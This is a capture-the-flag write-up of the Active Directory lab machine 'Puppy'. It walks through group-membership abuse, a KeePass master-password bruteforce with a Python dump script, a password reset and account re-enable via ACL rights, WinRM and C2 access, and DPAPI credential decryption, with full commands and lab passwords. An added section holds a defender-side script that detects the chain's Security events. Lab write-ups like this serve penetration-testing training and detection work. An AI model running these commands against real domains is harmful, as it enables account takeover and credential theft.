Syk0

Puppy

Initial machine information

As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!

Overview

Puppy is an Active Directory machine where starting credentials have GenericWrite over a group (via an intermediate group), enabling group membership manipulation to access a Dev share. The share contains a KeePass database whose master password bruteforces quickly, yielding multiple credentials. BloodHound maps further ACL paths leading to a disabled account that can be re-enabled. A site backup ZIP in that user's accessible share contains a password for another account. DPAPI credential files on that user's profile decrypt to reveal the admin credentials.


Recon

Nmap

sudo nmap -sC -sV -vv -oA tcp 10.129.232.75 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.232.75

Standard Windows DC. Credentials levi.james:KingofAkron2025! are provided.

SMB Enumeration

Run NXC with the provided credentials to validate access.

BloodHound Mapping

bloodhound-ce-python -c all -u levi.james -p 'KingofAkron2025!' -d puppy.htb -dc puppy.htb --dns-tcp -ns 10.129.232.75

BloodHound reveals: levi.james → HR group → GenericWrite over DEVELOPERS group. This allows adding arbitrary members to the Developers group.


Foothold

GenericWrite - Self-Add to Developers

Add levi.james to the DEVELOPERS group:

net rpc group addmem "DEVELOPERS" "levi.james" \
  -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S "puppy.htb"

Access the newly available Dev share.

KeePass Bruteforce

The Dev share contains recovery.kdbx - a KeePass database. Bruteforce the master password using:

https://github.com/toneillcodes/brutalkeepass/

Master password: liverpool

Extract credentials with Python:

from pykeepass import PyKeePass

# Open the recovered database with the bruteforced master password
kp = PyKeePass("/path/to/recovery.kdbx", password="liverpool")

# Walk every entry and dump it together with its cleartext password
for e in kp.entries:
    print(e)
    print(e.password)

Extracted credentials:

JAMIE WILLIAMSON  → JamieLove2025!
ADAM SILVER       → HJKL2025!
ANTONY C. EDWARDS → Antman2025!
STEVE TUCKER      → Steve2025!
SAMUEL BLAKE      → ILY2025!

ACL Chain - ANT.EDWARDS → ADAM.SILVER

BloodHound shows:

  • Anthony (ANT.EDWARDS) has read/write on the Dev share
  • Anthony has GenericAll over ADAM.SILVER via the Senior Devs group

Reset Adam.Silver's password using Anthony's credentials:

net rpc password "adam.silver" 'HJKL2025!' \
  -U "puppy.htb"/"ANT.EDWARDS"%'Antman2025!' -S "puppy.htb"

Adam.Silver's account is disabled - re-enable it:

bloodyAD --host 10.129.232.75 -u "ANT.EDWARDS" -p 'Antman2025!' -d 'puppy.htb' \
  remove uac "adam.silver" -f ACCOUNTDISABLE

WinRM access as Adam.Silver:

evil-winrm-py -i 10.129.232.75 -u adam.silver -p 'HJKL2025!'
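Each of the three directory changes in this section leaves a Security event on the DC: 4728 for the group membership add, 4724 for the password reset and 4722 for the account re-enable. As an added defender-side example (not part of the original writeup), the script below parses constructed sample events and flags the two patterns the chain produces; the JSON field names mirror the Security event XML and the RIDs appended to the domain SID are made up.

```python
import json
from datetime import datetime, timedelta

# Constructed sample Security-log records (not captured from the box), serialised as
# newline-delimited JSON the way a log forwarder ships them. Field names follow the
# Windows Security event XML; the RIDs appended to the domain SID are made up.
DOMAIN_SID = "S-1-5-21-1487982659-1829050783-2281216199"
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"EventID": 4728, "TimeCreated": "2025-05-17T10:01:05Z", "SubjectUserName": "levi.james",
     "SubjectUserSid": DOMAIN_SID + "-1501", "TargetUserName": "DEVELOPERS",
     "MemberSid": DOMAIN_SID + "-1501"},                       # member == subject
    {"EventID": 4724, "TimeCreated": "2025-05-17T10:05:12Z", "SubjectUserName": "ant.edwards",
     "SubjectUserSid": DOMAIN_SID + "-1503", "TargetUserName": "adam.silver"},
    {"EventID": 4722, "TimeCreated": "2025-05-17T10:05:40Z", "SubjectUserName": "ant.edwards",
     "SubjectUserSid": DOMAIN_SID + "-1503", "TargetUserName": "adam.silver"},
    {"EventID": 4724, "TimeCreated": "2025-05-17T11:20:00Z", "SubjectUserName": "helpdesk01",
     "SubjectUserSid": DOMAIN_SID + "-1504", "TargetUserName": "steve.tucker"},  # reset only
])


def parse_events(text):
    """Parse newline-delimited JSON events, attaching a datetime for ordering."""
    events = [json.loads(line) for line in text.splitlines() if line.strip()]
    for ev in events:
        ev["ts"] = datetime.strptime(ev["TimeCreated"], "%Y-%m-%dT%H:%M:%SZ")
    return events


def detect_self_group_add(events):
    """4728 where the member being added is the account performing the add."""
    return [f"self-add: {e['SubjectUserName']} -> {e['TargetUserName']}"
            for e in events if e["EventID"] == 4728 and e.get("MemberSid") == e["SubjectUserSid"]]


def detect_reset_then_enable(events, window=timedelta(minutes=10)):
    """4724 (password reset) followed within `window` by 4722 (account enabled) on the
    same target by the same subject: the signature of taking over a disabled account."""
    resets = [e for e in events if e["EventID"] == 4724]
    return [f"reset+enable: {en['SubjectUserName']} -> {en['TargetUserName']}"
            for en in events if en["EventID"] == 4722
            for r in resets
            if r["TargetUserName"] == en["TargetUserName"]
            and r["SubjectUserSid"] == en["SubjectUserSid"]
            and timedelta(0) <= en["ts"] - r["ts"] <= window]


def run(text=SAMPLE_LOG):
    events = parse_events(text)
    return detect_self_group_add(events) + detect_reset_then_enable(events)


if __name__ == "__main__":
    print("\n".join(run()))
```

The lone 4724 against steve.tucker is not flagged, since a reset without a following enable by the same subject is ordinary helpdesk activity.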

Lateral Movement

Switch to an AdaptixC2 beacon from the Evil-WinRM session.

A site-backup.zip is found in an accessible location. The ZIP contains a config file with a password for steph.cooper:

steph.cooper:ChefSteph2025!

Obtain an AdaptixC2 beacon as steph.cooper.


Privilege Escalation

DPAPI - Credential File Decryption

Seatbelt finds Windows Credential Manager files (DPAPI-encrypted) in steph.cooper's profile:

.\Seatbelt.exe WindowsCredentialFiles

Download the credential files and decrypt them locally. First, decrypt the DPAPI master key using the user's password and SID:

impacket-dpapi masterkey -file key -password 'ChefSteph2025!' \
  -sid S-1-5-21-1487982659-1829050783-2281216199-1107

Then decrypt the credential file with the derived key:

impacket-dpapi credential -file local \
  -key "0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84"

Decrypted credentials:

Username : steph.cooper_adm
Password : FivethChipOnItsWay2025!

steph.cooper_adm is an administrative account. Authenticate and retrieve the root flag.


Attack Chain Summary

Phase              | Technique                                 | Result
-------------------|-------------------------------------------|-----------------------------
Recon              | BloodHound                                | GenericWrite over DEVELOPERS
Group abuse        | net rpc group addmem                      | Dev share access
Credential access  | KeePass bruteforce (liverpool)            | 5 user credentials
ACL abuse          | GenericAll → password reset + UAC remove  | adam.silver WinRM
Lateral movement   | Site backup ZIP credential                | steph.cooper beacon
Privesc            | DPAPI master key + credential decrypt     | steph.cooper_adm password